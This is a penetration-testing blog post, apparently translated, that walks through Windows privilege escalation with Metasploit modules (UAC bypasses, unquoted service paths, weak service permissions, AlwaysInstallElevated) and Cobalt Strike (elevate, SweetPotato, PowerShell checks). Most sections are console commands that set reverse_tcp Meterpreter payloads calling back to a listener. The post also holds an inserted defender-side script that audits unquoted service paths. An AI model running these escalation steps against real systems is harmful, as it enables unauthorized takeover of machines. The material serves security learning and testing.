Privilege Escalation with MSF and CS Modules

admin, 2021-08-27 14:40:29

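/01 Metasploit privilege escalation modules

I. Meterpreter privilege escalation

1. Meterpreter automatic privilege escalation command

Check the current privileges: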

getuid

Meterpreter's automatic privilege escalation command:

getsystem

Result when run as a normal user:

[screenshot]

Result when run as administrator:

[screenshot]

2. When the escalation command fails: bypassing UAC

2.1 bypassuac module

This can be used when not running as administrator.

msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/bypassuac) > set session 5
session => 5
msf6 exploit(windows/local/bypassuac) > exploit

2.2 bypassuac_injection

msf6 exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_injection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/bypassuac_injection) > set lport 6667
lport => 6667
msf6 exploit(windows/local/bypassuac_injection) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_injection) > exploit

Tips:

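After many tests: note that the payload setting must match the target machine, and the target must match as well, rather than following the settings of our original connection.

3. windows-kernel-exploits (a collection of Windows privilege escalation exploits):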

https://github.com/SecWiki/windows-kernel-exploits

msf6  > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

4. bypassuac_eventvwr

msf6 exploit(windows/local/bypassuac_eventvwr) > show options

Module options (exploit/windows/local/bypassuac_eventvwr):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.11.11    yes       The listen address (an interface may be specified)
   LPORT     6699             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/bypassuac_eventvwr) > run

This module is something of a black art: only an x86 payload and target can be used.

II. unquoted_service_path module

msf6 exploit(windows/local/service_permissions) > use exploit/windows/local/unquoted_service_path
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/unquoted_service_path) > run
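
Added example (not part of the original post): a defender-side audit for the misconfiguration the unquoted_service_path module depends on. It flags service ImagePath values whose executable path contains spaces but is not quoted, lists the earlier paths Windows would try under CreateProcess's documented parsing, and gives the quoted value to set. The service names and paths are constructed sample data and the function names are hypothetical.

```python
import ntpath
import re

# Constructed sample data (not from the page): service name -> ImagePath value
# as stored under HKLM\SYSTEM\CurrentControlSet\Services\<name>.
SAMPLE_SERVICES = {
    "GoodQuoted": r'"C:\Program Files\Vendor App\svc.exe" -k run',
    "NoSpaces": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "BadUnquoted": r"C:\Program Files\Vendor App\bin\agent.exe --service",
    "SpaceInArgsOnly": r"C:\Tools\agent.exe --config C:\My Data\a.ini",
}

# Executable = shortest prefix ending in ".exe" that is followed by a space or end.
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)


def executable_part(image_path):
    """Return the executable part of an unquoted ImagePath, or None if quoted."""
    path = image_path.strip()
    if path.startswith('"'):
        return None
    match = EXE_RE.match(path)
    return match.group(1) if match else path.split(" ")[0]


def audit(services):
    """Map each affected service to the paths to review and the quoted fix."""
    findings = {}
    for name, image_path in services.items():
        exe = executable_part(image_path)
        if exe is None or " " not in exe:
            continue  # quoted, or no space inside the executable path
        # CreateProcess tries the prefix before each space, with ".exe" appended,
        # before it reaches the intended binary.
        earlier = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
        args = image_path.strip()[len(exe):]
        findings[name] = {
            "earlier_paths": earlier,
            "review_acl_on": sorted({ntpath.dirname(p) for p in earlier}),
            "quoted_image_path": '"%s"%s' % (exe, args),
        }
    return findings


if __name__ == "__main__":
    for svc, info in audit(SAMPLE_SERVICES).items():
        print(svc, info)
```

Quoting the ImagePath removes the ambiguity; the directories in review_acl_on should also be writable only by administrators.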

III. service_permissions module

msf6 exploit(windows/local/always_install_elevated) > use exploit/windows/local/service_permissions
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/service_permissions) > set session 3
session => 3
msf6 exploit(windows/local/service_permissions) > run

No weak service was found.

IV. always_install_elevated module

msf6 exploit(windows/local/bypassuac_injection) > use exploit/windows/local/always_install_elevated
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set lhost 192.168.11.11
lhost => 192.168.11.11
msf6 exploit(windows/local/always_install_elevated) > set session 3
session => 3
msf6 exploit(windows/local/always_install_elevated) > run

V. Other

https://www.freebuf.com/articles/system/184289.html

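/02 Cobalt Strike privilege escalation modules

I. Elevate

The general approach is to download privilege escalation scripts that others have written and published online, install them, then right-click a machine on which you already hold normal user privileges and run elevate.

[screenshot]

[screenshot]

In the first, you choose the listener; in the second, you run the privilege escalation script, which can be added manually.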

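II. Your own privilege escalation EXE

The idea is to download a privilege escalation EXE, upload it to the machine where privileges are to be raised, and then run it remotely with the command: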

execute -Hc -f XXXX.exe

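Here -H hides the command prompt, -c redirects input and output, and -f specifies the program to run.

III. PowerShell

Run a PowerShell privilege escalation script: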

# Configure policy
powershell Invoke-ALLChecks

help powershell-import
use:
powershell-import [/path/to/local/script.ps1]

IV. Adding extensions to CS, such as SweetPotato

beacon> elevate SweetPotato https

If it has not been loaded, the result is:

[screenshot]

Tip:

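Comparing the privilege escalation options of MSF and CS, I lean toward MSF because it is more comprehensive and does not require downloading anything; of course, if you can write your own privilege escalation scripts and have a rich library of them, ignore what I said.

This exposed a weakness of mine: I am not proficient with CS, probably because I use it so little. Most of the time I use MSF and only rarely CS, but for team collaboration it is best to know both; I will catch up when I have time.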

FROM: https://ailumao.cn/ | Author: Ailumao
